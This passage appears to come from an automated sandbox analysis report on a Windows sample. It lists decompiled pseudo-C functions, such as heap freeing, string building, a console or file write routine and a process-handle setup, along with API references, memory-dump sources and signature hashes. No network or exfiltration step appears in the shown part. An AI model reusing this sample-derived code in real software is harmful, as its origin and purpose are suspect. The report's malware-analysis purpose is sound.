						_t36 = E00A873E0(_t34, _t41, _a8);
						E00A853BB(_t41);
						_t42 = E00A815FD(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00A853BB(_t36);
							_t36 = _t42;
						}
						_t43 = E00A8698B(_t36, _t33);
						if(_t43 != 0) {
							E00A853BB(_t36);
							_t36 = _t43;
						}
					}
					E00A853BB(_t28);
				}
				return _t36;
			}














                                                                                                                                                                                                                                0x00a822ab
                                                                                                                                                                                                                                0x00a822ae
                                                                                                                                                                                                                                0x00a822af
                                                                                                                                                                                                                                0x00a822b7
                                                                                                                                                                                                                                0x00a822be
                                                                                                                                                                                                                                0x00a822c5
                                                                                                                                                                                                                                0x00a822c9
                                                                                                                                                                                                                                0x00a822cf
                                                                                                                                                                                                                                0x00a822d6
                                                                                                                                                                                                                                0x00a822db
                                                                                                                                                                                                                                0x00a822ed
                                                                                                                                                                                                                                0x00a822f1
                                                                                                                                                                                                                                0x00a822f5
                                                                                                                                                                                                                                0x00a822fb
                                                                                                                                                                                                                                0x00a82300
                                                                                                                                                                                                                                0x00a82310
                                                                                                                                                                                                                                0x00a82312
                                                                                                                                                                                                                                0x00a82329
                                                                                                                                                                                                                                0x00a8232d
                                                                                                                                                                                                                                0x00a82330
                                                                                                                                                                                                                                0x00a82335
                                                                                                                                                                                                                                0x00a82335
                                                                                                                                                                                                                                0x00a8233e
                                                                                                                                                                                                                                0x00a82342
                                                                                                                                                                                                                                0x00a82345
                                                                                                                                                                                                                                0x00a8234a
                                                                                                                                                                                                                                0x00a8234a
                                                                                                                                                                                                                                0x00a82342
                                                                                                                                                                                                                                0x00a8234d
                                                                                                                                                                                                                                0x00a8234d
                                                                                                                                                                                                                                0x00a82358

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A81BB5: lstrlen.KERNEL32(00000000,00000000,00000000,770CC740,?,?,?,00A822C5,253D7325,00000000,00000000,770CC740,?,?,00A8A714,?), ref: 00A81C1C
                                                                                                                                                                                                                                  • Part of subcall function 00A81BB5: sprintf.NTDLL ref: 00A81C3D
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,00A8A714,?,01AE95B0), ref: 00A822D6
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,?,?,00A8A714,?,01AE95B0), ref: 00A822DE
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • strcpy.NTDLL ref: 00A822F5
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00A82300
                                                                                                                                                                                                                                  • Part of subcall function 00A873E0: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00A8230F,00000000,?,?,?,00A8A714,?,01AE95B0), ref: 00A873F7
                                                                                                                                                                                                                                  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A8A714,?,01AE95B0), ref: 00A8231D
                                                                                                                                                                                                                                  • Part of subcall function 00A815FD: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00A82329,00000000,?,?,00A8A714,?,01AE95B0), ref: 00A81607
                                                                                                                                                                                                                                  • Part of subcall function 00A815FD: _snprintf.NTDLL ref: 00A81665
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                • String ID: =
                                                                                                                                                                                                                                • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                • Opcode ID: 8d9d13848f9317266f244b8c68b0740862cc28ee0829617e7a61c5705fae6f0e
                                                                                                                                                                                                                                • Instruction ID: 419922e2deb4a53bf1ebbb16f0a7481aeacbf7daeaa52499decd6807c7da63d4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d9d13848f9317266f244b8c68b0740862cc28ee0829617e7a61c5705fae6f0e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B711A53390192577C712BBB49D99CBF3AADDE857A03090155F9059F202DE78DD035BE1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DEA18, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DEA18(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E736DE9E0(_t45, 7);
					E736DE9E0(_t45 + 0x1c, 7);
					E736DE9E0(_t45 + 0x38, 0xc);
					E736DE9E0(_t45 + 0x68, 0xc);
					E736DE9E0(_t45 + 0x98, 2);
					E736DA293( *((intOrPtr*)(_t45 + 0xa0)));
					E736DA293( *((intOrPtr*)(_t45 + 0xa4)));
					E736DA293( *((intOrPtr*)(_t45 + 0xa8)));
					E736DE9E0(_t45 + 0xb4, 7);
					E736DE9E0(_t45 + 0xd0, 7);
					E736DE9E0(_t45 + 0xec, 0xc);
					E736DE9E0(_t45 + 0x11c, 0xc);
					E736DE9E0(_t45 + 0x14c, 2);
					E736DA293( *((intOrPtr*)(_t45 + 0x154)));
					E736DA293( *((intOrPtr*)(_t45 + 0x158)));
					E736DA293( *((intOrPtr*)(_t45 + 0x15c)));
					return E736DA293( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                                                                                                                                                                                                0x736dea1e
                                                                                                                                                                                                                                0x736dea23
                                                                                                                                                                                                                                0x736dea2c
                                                                                                                                                                                                                                0x736dea37
                                                                                                                                                                                                                                0x736dea42
                                                                                                                                                                                                                                0x736dea4d
                                                                                                                                                                                                                                0x736dea5b
                                                                                                                                                                                                                                0x736dea66
                                                                                                                                                                                                                                0x736dea71
                                                                                                                                                                                                                                0x736dea7c
                                                                                                                                                                                                                                0x736dea8a
                                                                                                                                                                                                                                0x736dea98
                                                                                                                                                                                                                                0x736deaa9
                                                                                                                                                                                                                                0x736deab7
                                                                                                                                                                                                                                0x736deac5
                                                                                                                                                                                                                                0x736dead0
                                                                                                                                                                                                                                0x736deadb
                                                                                                                                                                                                                                0x736deae6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736deaf6
                                                                                                                                                                                                                                0x736deafb

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 736DE9E0: _free.LIBCMT ref: 736DEA05
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEA66
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEA71
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEA7C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEAD0
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEADB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEAE6
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DEAF1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
                                                                                                                                                                                                                                • Instruction ID: 189ce76c6b9c226a19bbe03b6b7b582dbdd0a5891350e311c65d0ea30a470b2a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38114F75962B04ABED65A7B1CC06FCB779C6F00B40F440C29B3DEAA1D0DA69F6144658
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A86246, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A86246(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xa8d2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xa8d294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0xa8d290 = _t6;
					 *0xa8d29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xa8d28c = _t7;
					if(_t7 == 0) {
						 *0xa8d28c =  *0xa8d28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                                                                                                                                                                                                0x00a8624e
                                                                                                                                                                                                                                0x00a86254
                                                                                                                                                                                                                                0x00a8625b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a862b5
                                                                                                                                                                                                                                0x00a8625d
                                                                                                                                                                                                                                0x00a86265
                                                                                                                                                                                                                                0x00a86272
                                                                                                                                                                                                                                0x00a86272
                                                                                                                                                                                                                                0x00a862b2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a862b2
                                                                                                                                                                                                                                0x00a86274
                                                                                                                                                                                                                                0x00a86274
                                                                                                                                                                                                                                0x00a86279
                                                                                                                                                                                                                                0x00a8628b
                                                                                                                                                                                                                                0x00a86290
                                                                                                                                                                                                                                0x00a86296
                                                                                                                                                                                                                                0x00a8629c
                                                                                                                                                                                                                                0x00a862a3
                                                                                                                                                                                                                                0x00a862a5
                                                                                                                                                                                                                                0x00a862a5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a862ac
                                                                                                                                                                                                                                0x00a8626e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a86270
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00A84D41,?,?,00000001,?,?,?,00A85992,?), ref: 00A8624E
                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000001,?,?,?,00A85992,?), ref: 00A8625D
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00A85992,?), ref: 00A86279
                                                                                                                                                                                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00A85992,?), ref: 00A86296
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000001,?,?,?,00A85992,?), ref: 00A862B5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 2270775618-1701360479
                                                                                                                                                                                                                                • Opcode ID: 5edf01168725c622aba66a1dbc24686e8d802675d952f56a254f51ae48d4dae4
                                                                                                                                                                                                                                • Instruction ID: 614524e6b21f90f3009d5c09ac74bbddae778b6b28c4f169f64c2ccea48f37c5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5edf01168725c622aba66a1dbc24686e8d802675d952f56a254f51ae48d4dae4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADF04F70A40301EBEB20FBA4AC1AB953B75F7057A1F104559E546DA2E0FB70C442DF25
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DDB2B, Relevance: 9.3, APIs: 6, Instructions: 319fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 67%
                                                                                                                                                                                                                                			E736DDB2B(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				signed int _t244;
				intOrPtr _t247;
				signed char _t250;
				signed int _t251;
				signed char _t253;
				struct _OVERLAPPED* _t254;
				intOrPtr _t256;
				void* _t260;
				signed char _t261;
				void* _t262;
				void* _t264;
				long _t266;
				signed int _t269;
				long _t270;
				struct _OVERLAPPED* _t271;
				signed int _t272;
				intOrPtr _t274;
				signed int _t276;
				signed int _t279;
				long _t280;
				long _t281;
				signed char _t282;
				intOrPtr _t283;
				signed int _t284;
				void* _t285;
				void* _t286;

				_t172 =  *0x736eb004; // 0xa11be602
				_v8 = _t172 ^ _t284;
				_t174 = _a8;
				_t261 = _a12;
				_t272 = (_t174 & 0x0000003f) * 0x38;
				_t244 = _t174 >> 6;
				_v112 = _t261;
				_v84 = _t244;
				_v80 = _t272;
				_t274 = _a16 + _t261;
				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x736ef800 + _t244 * 4)) + 0x18));
				_v104 = _t274;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E736D97DC( &_v72, _t261, 0);
				asm("stosd");
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x736ef800 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x736eb750)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x736ef800 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x736eb750)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x736ef800 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E736D82C0( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x736ef800 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E736DE75D(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E736DB595(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t276 = _v88 - _v112 + _t266;
											_v92 = _t276;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t266 >= _v104) {
														goto L52;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t276 = _t276 + 1;
															_v92 = _t276;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t250 = _v80;
						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t261 & 0x00000004;
						if((_t261 & 0x00000004) == 0) {
							_v33 =  *_t266;
							_t188 = E736DC8A4(_t261);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t266);
								goto L30;
							} else {
								_t202 = _t266 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t261 = _v84;
									_t253 = _v80;
									_t242 = _v33;
									 *((char*)(_t253 +  *((intOrPtr*)(0x736ef800 + _t261 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x736ef800 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x736ef800 + _t261 * 4)) + 0x2d) | 0x00000004;
									_t279 = _t276 + 1;
									goto L45;
								} else {
									_t206 = E736DC771( &_v76, _t266, 2);
									_t286 = _t285 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t266 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t261 = _t261 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t266;
							_push(2);
							 *(_t250 + _v52 + 0x2d) = _t261;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E736DC771();
							_t286 = _t285 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t284;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E736D6EA3(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
			}






















































































                                                                                                                                                                                                                                0x736ddb36
                                                                                                                                                                                                                                0x736ddb3d
                                                                                                                                                                                                                                0x736ddb40
                                                                                                                                                                                                                                0x736ddb45
                                                                                                                                                                                                                                0x736ddb4d
                                                                                                                                                                                                                                0x736ddb50
                                                                                                                                                                                                                                0x736ddb54
                                                                                                                                                                                                                                0x736ddb57
                                                                                                                                                                                                                                0x736ddb61
                                                                                                                                                                                                                                0x736ddb6b
                                                                                                                                                                                                                                0x736ddb6d
                                                                                                                                                                                                                                0x736ddb70
                                                                                                                                                                                                                                0x736ddb73
                                                                                                                                                                                                                                0x736ddb79
                                                                                                                                                                                                                                0x736ddb7b
                                                                                                                                                                                                                                0x736ddb82
                                                                                                                                                                                                                                0x736ddb8f
                                                                                                                                                                                                                                0x736ddb90
                                                                                                                                                                                                                                0x736ddb93
                                                                                                                                                                                                                                0x736ddb96
                                                                                                                                                                                                                                0x736ddb97
                                                                                                                                                                                                                                0x736ddb98
                                                                                                                                                                                                                                0x736ddb9b
                                                                                                                                                                                                                                0x736ddba0
                                                                                                                                                                                                                                0x736ddeac
                                                                                                                                                                                                                                0x736ddeac
                                                                                                                                                                                                                                0x736ddba6
                                                                                                                                                                                                                                0x736ddba6
                                                                                                                                                                                                                                0x736ddba9
                                                                                                                                                                                                                                0x736ddbab
                                                                                                                                                                                                                                0x736ddbb1
                                                                                                                                                                                                                                0x736ddbb4
                                                                                                                                                                                                                                0x736ddbbb
                                                                                                                                                                                                                                0x736ddbc2
                                                                                                                                                                                                                                0x736ddbcb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddbd1
                                                                                                                                                                                                                                0x736ddbd7
                                                                                                                                                                                                                                0x736ddbd9
                                                                                                                                                                                                                                0x736ddbdb
                                                                                                                                                                                                                                0x736ddbde
                                                                                                                                                                                                                                0x736ddbe3
                                                                                                                                                                                                                                0x736ddbe7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddbe7
                                                                                                                                                                                                                                0x736ddbec
                                                                                                                                                                                                                                0x736ddbef
                                                                                                                                                                                                                                0x736ddbf1
                                                                                                                                                                                                                                0x736ddbf6
                                                                                                                                                                                                                                0x736ddca8
                                                                                                                                                                                                                                0x736ddca9
                                                                                                                                                                                                                                0x736ddcac
                                                                                                                                                                                                                                0x736ddcae
                                                                                                                                                                                                                                0x736dde5c
                                                                                                                                                                                                                                0x736dde5e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde60
                                                                                                                                                                                                                                0x736dde60
                                                                                                                                                                                                                                0x736dde63
                                                                                                                                                                                                                                0x736dde66
                                                                                                                                                                                                                                0x736dde6f
                                                                                                                                                                                                                                0x736dde72
                                                                                                                                                                                                                                0x736dde73
                                                                                                                                                                                                                                0x736dde77
                                                                                                                                                                                                                                0x736dde7a
                                                                                                                                                                                                                                0x736dde7a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dde7e
                                                                                                                                                                                                                                0x736ddcb4
                                                                                                                                                                                                                                0x736ddcb4
                                                                                                                                                                                                                                0x736ddcb9
                                                                                                                                                                                                                                0x736ddcbc
                                                                                                                                                                                                                                0x736ddcc2
                                                                                                                                                                                                                                0x736ddcc8
                                                                                                                                                                                                                                0x736ddcd1
                                                                                                                                                                                                                                0x736ddcd4
                                                                                                                                                                                                                                0x736ddcd4
                                                                                                                                                                                                                                0x736ddcd5
                                                                                                                                                                                                                                0x736ddcd6
                                                                                                                                                                                                                                0x736ddcd9
                                                                                                                                                                                                                                0x736ddcda
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddcda
                                                                                                                                                                                                                                0x736ddbfc
                                                                                                                                                                                                                                0x736ddc0b
                                                                                                                                                                                                                                0x736ddc0c
                                                                                                                                                                                                                                0x736ddc0f
                                                                                                                                                                                                                                0x736ddc11
                                                                                                                                                                                                                                0x736ddc16
                                                                                                                                                                                                                                0x736dde27
                                                                                                                                                                                                                                0x736dde29
                                                                                                                                                                                                                                0x736dde2b
                                                                                                                                                                                                                                0x736dde2e
                                                                                                                                                                                                                                0x736dde33
                                                                                                                                                                                                                                0x736dde3c
                                                                                                                                                                                                                                0x736dde3f
                                                                                                                                                                                                                                0x736dde40
                                                                                                                                                                                                                                0x736dde44
                                                                                                                                                                                                                                0x736dde47
                                                                                                                                                                                                                                0x736dde4a
                                                                                                                                                                                                                                0x736dde4a
                                                                                                                                                                                                                                0x736dde4e
                                                                                                                                                                                                                                0x736dde4e
                                                                                                                                                                                                                                0x736dde4e
                                                                                                                                                                                                                                0x736dde51
                                                                                                                                                                                                                                0x736dde51
                                                                                                                                                                                                                                0x736dde51
                                                                                                                                                                                                                                0x736dde53
                                                                                                                                                                                                                                0x736dde53
                                                                                                                                                                                                                                0x736dde57
                                                                                                                                                                                                                                0x736ddc1c
                                                                                                                                                                                                                                0x736ddc1c
                                                                                                                                                                                                                                0x736ddc20
                                                                                                                                                                                                                                0x736ddc22
                                                                                                                                                                                                                                0x736ddc25
                                                                                                                                                                                                                                0x736ddc28
                                                                                                                                                                                                                                0x736ddc2c
                                                                                                                                                                                                                                0x736ddc2d
                                                                                                                                                                                                                                0x736ddc31
                                                                                                                                                                                                                                0x736ddc31
                                                                                                                                                                                                                                0x736ddc34
                                                                                                                                                                                                                                0x736ddc39
                                                                                                                                                                                                                                0x736ddc45
                                                                                                                                                                                                                                0x736ddc4a
                                                                                                                                                                                                                                0x736ddc4d
                                                                                                                                                                                                                                0x736ddc4d
                                                                                                                                                                                                                                0x736ddc52
                                                                                                                                                                                                                                0x736ddc54
                                                                                                                                                                                                                                0x736ddc57
                                                                                                                                                                                                                                0x736ddc59
                                                                                                                                                                                                                                0x736ddc5c
                                                                                                                                                                                                                                0x736ddc5f
                                                                                                                                                                                                                                0x736ddc62
                                                                                                                                                                                                                                0x736ddc6a
